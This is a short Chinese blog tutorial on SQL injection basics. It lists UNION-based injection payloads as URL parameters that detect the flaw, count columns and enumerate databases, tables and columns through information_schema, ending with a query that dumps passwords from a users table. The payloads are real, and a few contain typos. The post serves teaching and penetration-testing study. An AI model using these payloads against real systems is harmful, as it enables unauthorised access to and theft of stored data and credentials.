渗透测试-SQL注入原理

最新推荐文章于 2024-07-20 17:45:06 发布

渗透测试小白

最新推荐文章于 2024-07-20 17:45:06 发布

阅读量157

点赞数 1

分类专栏： WEB安全基础文章标签： sql oracle 数据库网络安全渗透测试

本文链接：https://blog.csdn.net/weixin_44971640/article/details/132321596

版权

WEB安全基础专栏收录该内容

20 篇文章 13 订阅

订阅专栏

文章目录

sql注入原理
sql注入基本流程

sql注入原理

sql注入基本流程

判断是否存在注入，是否会将用户输入拼接到sql语句，并当做代码执行

/?id=1 and 1=1 
/?id=2-1
/?id=1 and sleep(5)
....
....

判断字段数

order by （排序用来判断字段数）

/?id=1 order by 1
/?id=1 order by 2
.....
.....

判断显错位

union select (联合查询)
/?id=1 and 1=2 union selcet 1,2,database()

判断库名

database()  查询数据库名函数
/?id=1 and 1=2 union select 2,database(),3

判断表名

 /?id-1 and 1=2 union select 2,3,group_concat(table_name) from information_schema.tables where table_schema='security'

table_name :表名称
information_schema.tables：是MySQL系统数据库中的一个表，用于存储与数据库中表相关的元数据（即元数据信息）
table_schema:表所在的数据库名称

判断列名

/?id=1 and 1=2 union select 2,4,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

column_name : 字段名
information_schema.columns：是MySQL系统数据库中的一个表，用于存储与数据库中表列相关的元数据。
table_schema:表所在的数据库名称
table_name :表名称

判断具体数据

/?id=1 and 1=2 union select 2,4,password from users